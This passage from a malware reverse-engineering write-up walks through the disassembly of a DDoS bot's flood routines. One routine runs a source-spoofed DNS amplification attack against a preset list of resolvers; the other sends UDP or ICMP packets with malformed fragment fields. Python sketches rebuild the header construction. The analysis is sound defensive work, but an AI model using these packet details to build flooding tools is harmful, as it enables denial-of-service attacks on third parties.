0x1c(%ebp) and 0x20(%ebp) are then checked. These variables match up to
be LongE and LongF.
If LongE and LongF are both 0, we do another random() call with:
0x8049374: movl $0x7530,%ebx
0x804937a: idivl %ebx,%eax
0x804937c: movl %edx,%eax
Resulting in %eax being some random number 0 to 0x752f (29999).
If either LongE or LongF is non-zero:
0x8049380: movl 0x1c(%ebp),%eax
0x8049383: shll $0x8,%eax
0x8049386: addw 0x20(%ebp),%ax
The low-order end of %eax is filled such that LongE forms %ah.
At this point, %eax is filled with either a random number below 0x7530,
or a value represented by LongE and LongF.
Whatever the outcome:
0x804938a: xchgb %al,%ah
The two bytes are exchanged (possibly a crude/optimised form of
htons()?).
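A minimal sketch of the two steps above, assuming LongE and LongF are
the high and low bytes of the requested source port. The function
names are hypothetical; only the arithmetic mirrors the instructions.

```python
import struct

def source_port_word(long_e, long_f):
    # shll $0x8,%eax followed by addw 0x20(%ebp),%ax, kept to 16 bits.
    return ((long_e << 8) + long_f) & 0xFFFF

def xchg_al_ah(ax):
    # xchgb %al,%ah swaps the two bytes of the 16-bit register.
    return ((ax & 0xFF) << 8) | (ax >> 8)

port = source_port_word(0x12, 0x34)
swapped = xchg_al_ah(port)

# Storing the swapped word with a little-endian movw puts the port on
# the wire in network (big-endian) order, which is what htons() is for.
print(struct.pack("<H", swapped) == struct.pack("!H", port))
```

On a little-endian machine the swap therefore has the same effect as
htons(), which supports the guess made above.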
Some more of the 'believed packet' is constructed:
0x804938c: movl 0xfffff9a4(%ebp),%ebx
0x8049392: movw %ax,(%ebx)
0x8049395: movl 0xfffff9a4(%ebp),%ebx
0x804939b: movw $0x3500,0x2(%ebx)
0x80493a1: movw 0xffffffdc(%ebp,%edi,4),%ax
0x80493a6: addw $0x8,%ax
0x80493aa: xchgb %al,%ah
0x80493ac: movw %ax,0x4(%ebx)
The exchanged bytes are put into place at what would correspond to the
UDP header's source port (definitely explains the exchange). 2 bytes
after this (the destination port), 0x3500 is positioned. 0x3500
corresponds to a destination port of 53(DNS). 0x4(%ebx) will correspond
to the udp length, and is set to 0x8(udp header length) plus an indexed
value starting at 0xffffffdc(%ebp). This starting point saw 9 values
between 20 and 25 placed in and after it.
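The header described above can be rebuilt as a sketch. It assumes the
nine indexed values are the payload lengths listed earlier; the names
QUERY_LENGTHS and udp_header are made up for illustration.

```python
import struct

# The nine values seen earlier at 0xffffffdc(%ebp), assumed to be the
# payload length for each of the nine preset data blocks.
QUERY_LENGTHS = [21, 21, 20, 21, 21, 25, 20, 20, 20]

def udp_header(source_port, payload_len):
    # source port, destination port 53, length = 8 + payload, checksum
    # left at 0 (as the code does at this point), in network order.
    return struct.pack("!HHHH", source_port, 53, 8 + payload_len, 0)

header = udp_header(0x1234, QUERY_LENGTHS[5])
print(header.hex())

# movw $0x3500,0x2(%ebx) stores the bytes 00 35 on little-endian x86,
# which is port 53 when read back in network order.
print(struct.pack("<H", 0x3500) == header[2:4])
```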
0x80493b0: movw $0x0,0x6(%ebx)
0x80493b6: cmpl $0x0,0x24(%ebp)
0x80493ba: jne 0x80493ec
0x6(%ebx) would be the udp header checksum, and is set to 0. The value
corresponding to LongG is then checked and if it is zero, some
copying takes place. The actual values will be LongA, LongB, LongC, and
LongD (See code at 0x8049180 to know why). They are placed into the
'packet buffer' positioned as the IP header source address. It should
be noted here that if LongG was non-zero, the earlier gethostbyname()
would have been called, and if successful, it would have filled in the
source IP address.
0x80493ec: movl 0xfffff994(%ebp),%ebx
0x80493f2: movl (%ebx),%eax
0x80493f4: movl %eax,0x10(%esi)
0x80493f7: movb $0x45,(%esi)
0xfffff994(%ebp) was earlier set as a pointer to some indexed data. The
long value from that memory location is then copied to 0x10(%esi). %esi
at this point should still be set to the beginning of the 'packet
buffer'. indexing 16bytes into that buffer is the destination IP
address. That indexed buffer must correspond to IP addresses?
[considering the index was a random 0 to 7999 this leads one to assume
there's either an error, or this binary contains 8000 IP addresses!?!?]
The value 0x45 (such an easily recognisable number!) is moved into
the first byte of the 'packet buffer'. This corresponds to an IP
version 4 packet, with a header length set to 5 (indicating a 5*4 = 20
byte header). There is now no doubt that this buffer is indeed for
packet construction.
0x80493fa: call 0x8055e38
0x80493ff: movl $0x82,%ebx
0x8049404: cltd
0x8049405: idivl %ebx,%eax
0x8049407: addb $0x78,%dl
0x804940a: movb %dl,0x8(%esi)
Once again, random + mod code, this time with a +0x78. This is inserted
into the IP TTL section (this explains the +0x78!). This ensures the
TTL is always set between 120 and 249.
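The range can be confirmed with a short sketch, assuming the value
returned by 0x8055e38 is non-negative (as random() would be). The
function name is hypothetical.

```python
def ttl_from_random(r):
    # idivl by 0x82 leaves the remainder in %edx; addb $0x78,%dl follows.
    return (r % 0x82) + 0x78

# Any run of 0x82 consecutive inputs covers every possible remainder.
ttls = {ttl_from_random(r) for r in range(0x82)}
print(min(ttls), max(ttls))
```

The remainder of a division by 0x82 (130) never exceeds 129, so the
largest TTL produced this way is 249.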
Some more randomising code, modded by 255, followed by:
0x804941a: movw %dx,0x4(%esi)
0x804941e: movb $0x11,0x9(%esi)
0x8049422: movw $0x0,0x6(%esi)
This corresponds to the IP header ID being a random 0-254 number. The
0x11 goes into the IP protocol position (udp!) and the 0 goes into the
IP offset position.
0x8049428: movw 0xffffffdc(%ebp,%edi,4),%ax
0x804942d: addw $0x1c,%ax
0x8049431: xchgb %al,%ah
0x8049433: movw %ax,0x2(%esi)
0x8049437: movw $0x0,0xa(%esi)
The 0xffffffdc(%ebp,%edi,4) indexed value should still correspond to
that 9 number list (20-25). On top of the indexed number, 28 is added.
This is obviously related to ip header size + udp header size. The
low-order word result bytes are exchanged (effectively a htons()), and
this word put into none other than the total length field of the IP
header. 0 is put into the checksum field for the IP header.
This is followed by a long set of mathematical instructions that operate
on the packet data. No changes to the data are made until:
0x80494a9: movw %ax,0xa(%esi)
Where the result of all these operations is put into the checksum field
once again. It is assumed these operations are some form of inline
chksum function, or the blackhat author wrote the checksum code directly
into this function. (Note that the checksum has NOT been verified to
be correct!)
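For comparison, this is a sketch of the standard Internet checksum
(RFC 1071) that an IP header normally carries. It is NOT a
transcription of the instructions in the binary, which have not been
verified; it only shows what a correct routine would compute. The
sample header bytes are a commonly used textbook example, not data
from the binary.

```python
def internet_checksum(data):
    # Pad to an even length, sum 16-bit big-endian words, fold the
    # carries back in, and return the one's complement of the result.
    if len(data) % 2:
        data += b"\x00"
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

# Sample 20 byte IP header with its checksum field (bytes 10-11) zeroed.
sample = bytes.fromhex("450000730000400040110000c0a80001c0a800c7")
print(hex(internet_checksum(sample)))
```

A captured packet from the binary could be checked the same way:
running the routine over a header with a correct checksum in place
gives 0.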
We then setup for a call:
0x80494ad: pushl $0x10
0x80494af: leal 0xfffffdd8(%ebp),%eax
0x80494b5: pushl %eax
0x80494b6: pushl $0x0
0x80494b8: movl 0xffffffdc(%ebp,%edi,4),%eax
0x80494bc: addl $0x1c,%eax
0x80494bf: pushl %eax
0x80494c0: leal 0xfffff9c8(%ebp),%eax
0x80494c6: pushl %eax
0x80494c7: movl 0xfffff9a8(%ebp),%ebx
0x80494cd: pushl %ebx
0x80494ce: call 0x8056c3c
The function is unknown, but it doesn't take long to work out what it is:
0x8056c69: movl $0xb,%edx
0x8056c71: movl $0x66,%eax
0x8056c76: movl %edx,%ebx
0x8056c78: int $0x80
Matching to a socketcall for SYS_SENDTO.
First parameter of 0xfffff9a8(%ebp) is indeed the socket returned by
socket() (see 0x8049218). Second matches with the 'packet buffer'. The
third is once again that indexed value plus 28. The fourth is 0. The
fifth is a pointer to 0xfffffdd8(%ebp) which in hindsight makes sense of
some earlier value assignments to form a sockaddr_in structure of
AF_INET type with port = 0 and the address was earlier (curiously) set
to the destination address. In construction of raw packets however,
this structure shouldn't have any effect. The final parameter is merely
the size of the sockaddr structure.
This should send the previously constructed packet off. Analysis of
this packet and its reasonings will be discussed in Network_Analysis_C.
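The syscall identification used throughout can be written down as a
lookup sketch. The numbers are the i386 Linux values (only the ones
seen in this analysis are listed, plus the first twelve socketcall
sub-calls); the function name identify is made up.

```python
# i386 Linux system call numbers seen so far (value placed in %eax).
SYSCALLS = {0x14: "getpid", 0x4E: "gettimeofday", 0x66: "socketcall"}

# socketcall sub-call numbers (value placed in %ebx), from linux/net.h.
SOCKETCALLS = {
    1: "SYS_SOCKET", 2: "SYS_BIND", 3: "SYS_CONNECT", 4: "SYS_LISTEN",
    5: "SYS_ACCEPT", 6: "SYS_GETSOCKNAME", 7: "SYS_GETPEERNAME",
    8: "SYS_SOCKETPAIR", 9: "SYS_SEND", 10: "SYS_RECV",
    11: "SYS_SENDTO", 12: "SYS_RECVFROM",
}

def identify(eax, ebx=None):
    # Name the call made by 'int $0x80' from the register contents.
    name = SYSCALLS.get(eax, "unknown")
    if name == "socketcall":
        return SOCKETCALLS.get(ebx, "unknown socketcall")
    return name

print(identify(0x66, 0xB))
```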
Following the sendto:
0x80494d6: cmpl $0x0,0x18(%ebp)
0x80494da: jne 0x80494e8
0x80494dc: pushl $0x12c
0x80494e1: call 0x80555b0
0x80494e6: jmp 0x8049507
The check uses the NumberA parameter to this function. If it is 0, it
will call usleep(0x12c), and if not:
0x80494e8: movl 0x18(%ebp),%ebx
0x80494eb: cmpl %ebx,0xfffff99c(%ebp)
0x80494f1: jne 0x8049514
0x80494f3: pushl $0x12c
0x80494f8: call 0x80555b0
0x80494fd: movl $0x0,0xfffff99c(%ebp)
0x8049507: decl 0xfffff998(%ebp)
0xfffff99c(%ebp) was earlier set to 0. It compares it to NumberA, and
if it is equal to it, it will usleep(0x12c), and set 0xfffff99c(%ebp) to
0. It also decrements the variable at 0xfffff998(%ebp) which seems to
be related to the gethostbyname() section.
If NumberA was not equal to 0xfffff99c(%ebp), it increments
0xfffff99c(%ebp) by 1.
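The pacing logic can be modelled with a sketch. It assumes the
increment of 0xfffff99c(%ebp) happens at 0x8049514 as described, and
that one pass through this code corresponds to one packet sent. The
function name is hypothetical.

```python
def count_sleeps(number_a, packets):
    # Counts how many usleep(0x12c) calls happen while sending packets.
    counter = 0   # models 0xfffff99c(%ebp)
    sleeps = 0
    for _ in range(packets):
        if number_a == 0 or counter == number_a:
            sleeps += 1   # usleep(0x12c); 0xfffff998(%ebp) decremented
            counter = 0
        else:
            counter += 1
    return sleeps

print(count_sleeps(0, 10), count_sleeps(3, 8))
```

Under these assumptions a NumberA of 0 sleeps after every packet,
while a NumberA of N sleeps once for every N+1 packets.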
Now comes the interesting part:
0x804951a: addl $0x4,0xfffff994(%ebp)
0x8049521: movl 0xfffff994(%ebp),%ebx
0x8049527: cmpl $0x0,(%ebx)
0x804952a: jne 0x8049308
0xfffff994(%ebp) is used as a pointer to IP addresses, by incrementing
it by 4, this moves it onto the next address. The space where the ip
address is supposed to be is checked to be 0 (indicator of the end of
the list one would assume). If it is not, it jumps back up to 0x8049308
and resends another packet. It repeats this until it hits that null.
Upon reaching the null:
0x8049530: addl $0x32,0xfffff990(%ebp)
0x8049537: incl %edi
0x8049538: cmpl $0x8,%edi
0x804953b: jle 0x80492c4
0x8049541: jmp 0x8049250
0xfffff990(%ebp) is incremented by 50. This is the pointer to the
packet data which, upon analysis of the actual indexed data, appears to
start again every 50 bytes (with slight differences). %edi is the index
for what appears to be the data sizes which will go up to, but not
including 9. There then appears to be a jump back up to 0x8049250 which
sees to the reset of all the indexes and pointers and restart the
process again.
It should be noted that there does not appear to be any exit condition,
making one assume that this function will continue until the process is
killed.
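The loop structure can be summarised in a sketch of one pass through
the outer loop. It is a simplified model: the address table is a
Python list ending in 0, first_start stands in for the random index
used on the first iteration, and it is not known from the code shown
whether that random start is used again after the jump back to
0x8049250. All names are made up.

```python
def one_pass(addresses, first_start=0, templates=9):
    # Returns the (template index, destination) pairs sent in one pass.
    sends = []
    for template in range(templates):          # %edi counts 0 to 8
        index = first_start if template == 0 else 0
        while addresses[index] != 0:           # stop at the null entry
            sends.append((template, addresses[index]))
            index += 1                         # addl $0x4 to the pointer
    return sends

table = [0x0A000001, 0x0A000002, 0x0A000003, 0]
print(len(one_pass(table)), len(one_pass(table, first_start=1)))
```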
Disassembly Review:
A long and complex function. It consists primarily of two loops, one
which appears to loop through data types which start at 0x80676bc, and
another within it that loops through IP addresses which start at
0x806d22c. There appear to be timing considerations included in the
code, possibly to alter the speed at which an infected machine will send
packets out. One cannot be sure how many packets per second would be
sent without a live test.
In reconstructing the function call:
Network_Function_B(IPOctet1, IPOctet2, IPOctet3, IPOctet4,
FloodSpeed, PortOctet1, PortOctet2, DNSFlag, Hostname)
If DNSFlag is 0, the IPOctets are used as the source address for the
outgoing packets. If it is non-zero, it will attempt to resolve
Hostname. 0xfffff998(%ebp) is also utilised in such a way that it will
try to re-resolve the hostname every 40000 usleep()'s (not necessarily
every X packets).
Function Overview:
A very nasty function. It appears to be a form of 'packetting'
function. The interesting thing about it is it specifies the source IP,
and the destinations are all preset within the binary - at least 8000 of
them!! [It turns out there's over 11,000 of them - See Appendix A]
With analysing the network traffic (will be done in Network_Analysis_C),
one can already see that packets are sent off to DNS servers on a dns
port. The source IP and source port are both able to be set by the
blackhat through his/her own communications channel. The actual attack
is undoubtedly a form of amplification attack.
Some easily seen 'features' of this attack:
* Can attack a single victim
* Attack can be done via hostname - on the attacking machine
* DNS lookups are done occasionally and the IP address updated
* The attack is scalable on a packets-per-second basis
* Attack has no timeout
* 9 different dns requests are used
e) Network_Function_C [0x80499f4] - (Network)
Known Usage:
function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
*0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp),
*0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp),
*0xfffff00b(%ebp), *0xfffff00c(%ebp), 0xffffbb44(%ebp))
Guesses at purpose:
Possibly another sort of packetting function like Network_Function_B.
Naming Conventions:
Parameters will be given the following names:
function(LongA, LongB, LongC, LongD, LongE, LongF,
LongG, LongH, LongI, LongJ, LongK, BufferA)
Disassembly:
The function starts with a much smaller local stack size than the
previous function:
0x80499f7: subl $0xa0,%esp
This is followed by copying of the parameters to localised variables,
and:
0x8049a3c: movw $0x2,0xfffffff0(%ebp)
0x8049a42: call 0x8055e38
First is a simple assignment, next is a call to what was earlier
believed to be random().
0x8049a47: movl $0xff,%ecx
0x8049a4c: cltd
0x8049a4d: idivl %ecx,%eax
0x8049a4f: movl %edx,%eax
0x8049a51: xchgb %al,%ah
0x8049a53: movw %ax,0xfffffff2(%ebp)
The result goes through the now familiar MOD'ing process, is xchg()'d in
what is probably a way of htons()'ing the number, and is finally stored
at 0xfffffff2(%ebp). This is two bytes after the previous 2 was moved
into at 0x8049a3c.
We then setup for a function call:
0x8049a57: movzbl %bl,%eax
0x8049a5a: pushl %eax
0x8049a5b: movzbl 0xffffff6c(%ebp),%eax
0x8049a62: pushl %eax
0x8049a63: movzbl 0xffffff70(%ebp),%eax
0x8049a6a: pushl %eax
0x8049a6b: movzbl 0xffffff74(%ebp),%eax
0x8049a72: pushl %eax
0x8049a73: pushl $0x806768a
0x8049a78: leal 0xffffff90(%ebp),%esi
0x8049a7b: pushl %esi
0x8049a7c: call 0x804f808
(gdb) x/1s 0x806768a
0x806768a: "%d.%d.%d.%d"
This function has been identified as sprintf(), so the call looks like:
sprintf(0xffffff90(%ebp), "%d.%d.%d.%d", *0xffffff74(%ebp),
*0xffffff70(%ebp), *0xffffff6c(%ebp), *bl)
When looking back at %bl, we soon see that all these addresses are
actually the local copies of the parameters, so:
sprintf(0xffffff90(%ebp), "%d.%d.%d.%d", LongG, LongH, LongI, LongJ)
One can immediately assume LongG-J are IP octets.
Conditional:
0x8049a84: cmpl $0x0,0x30(%ebp)
0x8049a88: jne 0x8049abe
0x30(%ebp) corresponds to LongK. If LongK is 0:
We setup for another call:
0x8049a8a: movzbl 0xffffff78(%ebp),%eax
0x8049a91: pushl %eax
0x8049a92: movzbl 0xffffff7c(%ebp),%eax
0x8049a99: pushl %eax
0x8049a9a: movzbl 0xffffff80(%ebp),%eax
0x8049a9e: pushl %eax
0x8049a9f: movzbl 0xffffff84(%ebp),%eax
0x8049aa3: pushl %eax
0x8049aa4: pushl $0x806768a
0x8049aa9: leal 0xffffffb0(%ebp),%ebx
0x8049aac: pushl %ebx
0x8049aad: call 0x804f808
Once again, another sprintf, similar to the first:
sprintf(0xffffffb0(%ebp), "%d.%d.%d.%d", LongC, LongD, LongE, LongF)
One can now assume LongC-F are also IP octets. %ebx is then pushed
back onto the stack:
0x8049ab2: pushl %ebx
0x8049ab3: call 0x804ce8c
0x804ce8c is unidentified, so we analyse it and see:
0x804ce9a: call 0x804ceb4
This is the only real action in that part, however this call is also
unidentified. Looking into this code, it appears to use the parameter
as a pointer, and is comprised of a main loop. This main loop appears
to scan through looking for 0x2e('.'). There are many checks done on
the buffer including for 0x30,0x78, aka "0x". This instantly makes
one look at the source code for inet_aton() which seems to closely
match (not precisely - at least not the version i looked at) the
disassembly. This also only explains the code at 0x804ceb4. The code
at 0x804ce8c can be easily explained by looking at the code to
inet_addr(). It matches precisely (to the source code i reviewed).
As such the code at 0x804ce8c will now be known as inet_addr, and the
code at 0x804ceb4 as inet_aton.
Upon function completion the return value is stored:
0x8049ab8: movl %eax,0xfffffff4(%ebp)
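The sprintf() and inet_addr() pair can be sketched as follows. The
octet masking mirrors the movzbl instructions (only the low byte of
each local copy is used); the helper names are made up, and Python's
socket.inet_aton stands in for the libc routine.

```python
import socket
import struct

def dotted_quad(a, b, c, d):
    # sprintf(buf, "%d.%d.%d.%d", ...) with each argument zero-extended
    # from a single byte, as movzbl does.
    return "%d.%d.%d.%d" % (a & 0xFF, b & 0xFF, c & 0xFF, d & 0xFF)

def inet_addr_le(text):
    # The 4 address bytes in network order, read back the way a
    # little-endian x86 would see them in %eax.
    return struct.unpack("<I", socket.inet_aton(text))[0]

text = dotted_quad(1, 2, 3, 4)
print(text, hex(inet_addr_le(text)))
```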
Regardless of LongK's earlier value, another function call is then setup
and launched:
0x8049abe: pushl $0xff
0x8049ac3: pushl $0x3
0x8049ac5: pushl $0x2
0x8049ac7: call 0x8056cf4
This one is a lot easier, and has already been identified as socket().
This corresponds to:
socket(AF_INET, SOCK_RAW, IPPROTO_RAW)
The socket descriptor is placed onto the stack:
0x8049acc: movl %eax,0xffffff68(%ebp)
0x8049ad5: testl %eax,%eax
0x8049ad7: jle 0x8049d24
The code will continue if the socket() call was successful:
0x8049add: movb $0x45,0xffffffd0(%ebp)
0x8049ae1: movw $0x1c28,0xffffffd2(%ebp)
0x8049ae7: movw $0x5504,0xffffffd4(%ebp)
0x8049aed: call 0x8055e38
0x8049af2: movl $0x82,%ecx
0x8049af7: cltd
0x8049af8: idivl %ecx,%eax
0x8049afa: addb $0x78,%dl
0x8049afd: movb %dl,0xffffffd8(%ebp)
Once again, the very noticeable value (to all packet watchers) of 0x45 is
seen which immediately raises the suspicion that another packet buffer
is being constructed (like in Network_Function_B). If assuming this to
be the case, 0xffffffd0(%ebp) would be the start of the IP header.
In keeping with this idea, the 0x1c28 would be placed into IP header
total length field. This should be htons()'d, as such the total length
would be 10268 bytes. The next value is 0x5504 and is placed into the
IP ID field. This corresponds to an ID of 1109. The call is to
random() in the familiar MOD'ing routine, this time ending in a MOD 130.
An additional 0x78(120) is also added. This number is stored in the IP
TTL field. This basically means a random TTL will be used between 120
and 249.
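The byte-order conversions above can be checked with a sketch. It
assumes the immediates are stored by a little-endian movw and then
read by the network as big-endian fields; wire_value is a made-up
helper name.

```python
import struct

def wire_value(immediate):
    # Store as a little-endian 16-bit word, read back in network order.
    return struct.unpack("!H", struct.pack("<H", immediate))[0]

for immediate in (0x1C28, 0x5504, 0x3500):
    print(hex(immediate), "->", wire_value(immediate))
```

The same helper works for any other 16-bit immediate moved into a
packet buffer in this binary.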
0x8049b00: pushl %esi
0x8049b01: call 0x804ce8c
0x8049b06: movl %eax,0xffffffdc(%ebp)
0x8049b09: addl $0x4,%esp
0x8049b0c: cmpl $0x0,0x30(%ebp)
0x8049b10: jne 0x8049b21
The first call is to inet_addr, and %esi is still assigned from the
first sprintf() earlier. The result is placed into 0xffffffdc(%ebp)
which corresponds to the source IP address. 0x30(%ebp) is matched to
LongK. If it is 0:
0x8049b12: leal 0xffffffb0(%ebp),%eax
0x8049b15: pushl %eax
0x8049b16: call 0x804ce8c
0x8049b1b: movl %eax,0xffffffe0(%ebp)
Once again, an inet_addr() call, using 0xffffffb0(%ebp). This address
matches up with the destination buffer for the second sprintf() call
earlier. The return value is placed into what would correspond to be
the destination IP address.
Back to non-conditional code:
0x8049b21: movw $0xfe1f,0xffffffd6(%ebp)
0x8049b27: movw $0x0,0xffffffda(%ebp)
0x8049b2d: cmpl $0x0,0x8(%ebp)
0x8049b31: je 0x8049bb0
The 0xfe1f (8190) will be placed into the IP offset position. LongA is
then checked:
If it is non-zero:
0x8049b33: movb $0x11,0xffffffd9(%ebp)
The value of 17 is placed into the IP protocol field of the packet
buffer, this makes it a UDP packet.
0x8049b48: movw %ax,0xffffffe4(%ebp)
A random number is generated, MOD 255'd, and xchg'd. The result is
placed into 0xffffffe4(%ebp) which would correspond to the beginning
of the UDP header, the source port.
0x8049b4c: movw 0xc(%ebp),%ax
0x8049b50: xchgb %al,%ah
0x8049b52: movw %ax,0xffffffe6(%ebp)
0x8049b56: movw $0x900,0xffffffe8(%ebp)
0xc(%ebp) is LongB, and is xchg'd then placed into 0xffffffe6(%ebp).
This corresponds to the UDP destination port. 0x900 is put into
0xffffffe8(%ebp), the UDP length field (9 bytes).
This is followed by a whole set of mathematical code, one which when
compared to the checksum code in Network_Function_B, matches. The
part of importance:
0x8049ba4: movw %ax,0xffffffea(%ebp)
This is where the result is placed into 0xffffffea(%ebp) which is the
UDP checksum. Once again, the checksum code has not been analysed to
be correct, and it may return a wrong result!
0x8049ba8: movb $0x61,0xffffffec(%ebp)
0x8049bac: jmp 0x8049c10
Finally, a value of 0x61 is placed into 0xffffffec(%ebp) which would
mark the start of the UDP data.
If the earlier check of LongA shows it to be 0:
0x8049bb0: movb $0x1,0xffffffd9(%ebp)
0x8049bb4: movb $0x8,0xffffffe4(%ebp)
0x8049bb8: movb $0x0,0xffffffe5(%ebp)
0x8049bbc: movw $0x0,0xffffffe6(%ebp)
The IP protocol is set to 1 (ICMP). ICMP header is assumed to follow
after a 20 byte IP header, in which case the ICMP type is set to 8
(ICMP_ECHO), the code is set to 0 (not used for ICMP echo), and the
checksum is set to 0. This is followed by the now recognisable
checksumming code ending in:
0x8049c0c: movw %ax,0xffffffe6(%ebp)
Which replaces the checksum with the determined value.
Ending the LongA conditionals:
0x8049c10: movl $0x1d,0xffffff64(%ebp)
Some variable is set to 29.
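The value 29 is consistent with the UDP branch of the packet built so
far, as this sketch of the arithmetic shows. It assumes a 20 byte IP
header with no options; the constant names are made up.

```python
IP_HEADER_LEN = 20    # 0x45: version 4, header length 5 * 4 bytes
UDP_HEADER_LEN = 8
udp_payload = b"\x61"  # the single byte placed at 0xffffffec(%ebp)

# Matches the 0x900 stored in the UDP length field (9 after swapping).
udp_length_field = UDP_HEADER_LEN + len(udp_payload)

# Bytes occupied by the buffer from 0xffffffd0(%ebp) onwards.
buffer_len = IP_HEADER_LEN + udp_length_field
print(udp_length_field, buffer_len, hex(buffer_len))
```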
What follows is yet more checksum code, ending in:
0x8049c64: movw %ax,0xffffffda(%ebp)
0xffffffda(%ebp) corresponds to the IP checksum field.
0x8049c6a: leal 0xfffffff0(%ebp),%ecx
0x8049c6d: movl %ecx,0xffffff60(%ebp)
0xfffffff0(%ebp) was earlier set to 2 at 0x8049a3c.
0x8049c73: leal 0xffffffd0(%ebp),%edi
%edi is loaded with 0xffffffd0(%ebp) which is the start of the 'packet
buffer'.
Comparisons are done:
0x8049c7a: cmpl $0x0,0x30(%ebp)
0x8049c7e: je 0x8049cce
0x8049c80: testl %ebx,%ebx
0x8049c82: jg 0x8049cce
0x30(%ebp) is referenced to LongK, and %ebx was set to 0 earlier
(initially). If LongK is non-zero and %ebx is not greater than 0, we
continue:
0x8049c84: movl 0x34(%ebp),%ecx
0x8049c87: pushl %ecx
0x8049c88: call 0x804bf80
0x34(%ebp) is referenced to BufferA, and 0x804bf80 is believed to be
gethostbyname() code. Fairly self-explanatory.
0x8049c8d: movl %eax,%edx
0x8049c92: testl %edx,%edx
0x8049c94: jne 0x8049cac
Result is checked (for failure of gethostbyname), if it failed:
0x8049c96: pushl $0x258
0x8049c9b: call 0x80556cc
0x8049ca0: movl $0x1,%esi
0x8049ca8: jmp 0x8049cce
First is a reference to sleep(0x258). %esi is believed to be used as a
variable at the moment, and is set to 1. A jump is in place, indicating
the earlier gethostbyname() check was an if-then-else. If the function
succeeded (in resolving the hostname in BufferA):
0x8049cac: pushl $0x4
0x8049cae: leal 0xffffff88(%ebp),%eax
0x8049cb1: pushl %eax
0x8049cb2: movl 0x10(%edx),%eax
0x8049cb5: movl (%eax),%eax
0x8049cb7: pushl %eax
0x8049cb8: call 0x8056480
Once again, we see the Misc_Data_Copy() function used in the same
way as seen before. %edx is a returned pointer to a hostent structure,
so 0x10(%edx) is h_addr_list and its first entry points to the first
resolved IP address of the hostname. Effectively the 4 bytes of this
IP address are copied into 0xffffff88(%ebp).
Continuing:
0x8049cbd: movl 0xffffff88(%ebp),%eax
0x8049cc0: movl %eax,0xffffffe0(%ebp)
0x8049cc3: movl %eax,0xfffffff4(%ebp)
0x8049cc6: movl $0x9c40,%ebx
0x8049cce: testl %esi,%esi
0x8049cd0: jne 0x8049d1d
0xffffff88(%ebp) will now be copied into 0xffffffe0(%ebp) which
is the destination IP address in the packet buffer. 0xfffffff4(%ebp) is
unknown. %ebx was used earlier to determine if gethostbyname() should
even be called. It is used identically to Network_Function_B as a way of
having gethostbyname() called after every X seconds(/minutes/hours).
%esi is used to keep track of gethostbyname failures. If gethostbyname
isn't even called, it should be 0. If it is called and is successful,
it should be 0, but if it was called and failed, it was set to 1 (see
0x8049ca0).
As such, if either it was not called, or it was called and succeeded:
0x8049cd2: pushl $0x10
0x8049cd4: movl 0xffffff60(%ebp),%ecx
0x8049cda: pushl %ecx
0x8049cdb: pushl $0x0
0x8049cdd: movl 0xffffff64(%ebp),%ecx
0x8049ce3: pushl %ecx
0x8049ce4: pushl %edi
0x8049ce5: movl 0xffffff68(%ebp),%ecx
0x8049ceb: pushl %ecx
0x8049cec: call 0x8056c3c
A quick look to see what %edi was:
0x8049c73: leal 0xffffffd0(%ebp),%edi
And the sendto() call looks like this:
sendto(*0xffffff68(%ebp), 0xffffffd0(%ebp), *0xffffff64(%ebp), 0,
*0xffffff60(%ebp), 0x10)
Looking at what each of these are, *0xffffff68(%ebp) should still be the
socket descriptor set at 0x8049acc. 0xffffffd0(%ebp) is the now well
known packet buffer for this function. *0xffffff64(%ebp) was earlier
set to 0x1d and is believed not to change. 0xffffff60(%ebp) is a
sockaddr structure, which when looking back has been set up with
values for family=AF_INET, port=random, and address=destination ip.
The sendto call is then set up and repeated again.
After this:
0x8049d13: pushl $0x14
0x8049d15: call 0x80555b0
Believed to be a usleep(20). This is followed by:
0x8049d1d: decl %ebx
0x8049d1e: jmp 0x8049c78
Just a reminder, that %ebx acts as a count-down. When it reaches 0, the
process will gethostbyname() the string in BufferA and reset %ebx to
40000. The process then jumps back up to 0x8049c78, in what looks to be
a process of simply checking the hostname, update IP (if it is time),
and continue sending packets!
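The countdown behaviour can be modelled with a sketch. It assumes
every lookup succeeds, that each pass through the loop sends exactly
two packets of 29 bytes, and it ignores the sleeps. The function and
parameter names are hypothetical.

```python
PACKET_BYTES = 0x1D   # length passed to sendto()
RELOAD = 0x9C40       # value put back into %ebx after a lookup

def simulate(iterations, use_hostname=True):
    # Returns (lookups performed, packets sent) after some loop passes.
    countdown = 0     # models %ebx
    lookups = 0
    packets = 0
    for _ in range(iterations):
        if use_hostname and countdown <= 0:
            lookups += 1          # gethostbyname(BufferA)
            countdown = RELOAD
        packets += 2              # two sendto() calls per pass
        countdown -= 1            # decl %ebx
    return lookups, packets

packets_between_lookups = simulate(RELOAD)[1]
print(packets_between_lookups, packets_between_lookups * PACKET_BYTES)
```

Under these assumptions a fresh lookup happens once every 40000
passes, that is every 80000 packets, or 2,320,000 bytes sent.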
Disassembly Review:
Network_Function_C is a lot simpler than Network_Function_B. It
appears to simply use the parameters to generate a packet buffer, and
forms a loop to continuously send packets. A solitary usleep(20) for
every 2 packets sent should rate limit the output to a constant.
LongA seems to be used to identify an ICMP or UDP packet (0 = ICMP,
anything else = UDP). LongB is used to set the packet destination port
(UDP only). LongC-F are used as the destination IP octets, and LongG-J
are used as the source octets. LongK is used to identify whether the
process should use the LongC-F octets, or if it should use an expected
hostname in BufferA.
Function Overview:
A strange function, with strange packet production - analysis of which
will be left for Network_Analysis_D. The outcome of this function will
be a flood of 29 byte udp or icmp packets. Very small, however the
packet header contains an IP offset of 8190, along with an IP size field
of 10268 bytes.
It's possible the author made 'several' mistakes when coding this
function, but given the good-coding of Network_Function_B, it may all be
intentional. The outcome of these packets is unknown, but will
certainly be examined in Network_Analysis_D.
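As a rough aid for that later examination, this sketch only works out
what the header fields claim. It assumes the usual IPv4 meaning of the
field at bytes 6-7 (3 flag bits, then a 13 bit offset counted in units
of 8 bytes); it says nothing about how a receiving stack actually
reacts. The names are made up.

```python
FRAG_FIELD = 0x1FFE          # 0xfe1f after the byte swap (8190)
CLAIMED_TOTAL_LENGTH = 10268  # 0x1c28 after the byte swap
IP_HEADER_LEN = 20

flags = FRAG_FIELD >> 13
offset_bytes = (FRAG_FIELD & 0x1FFF) * 8

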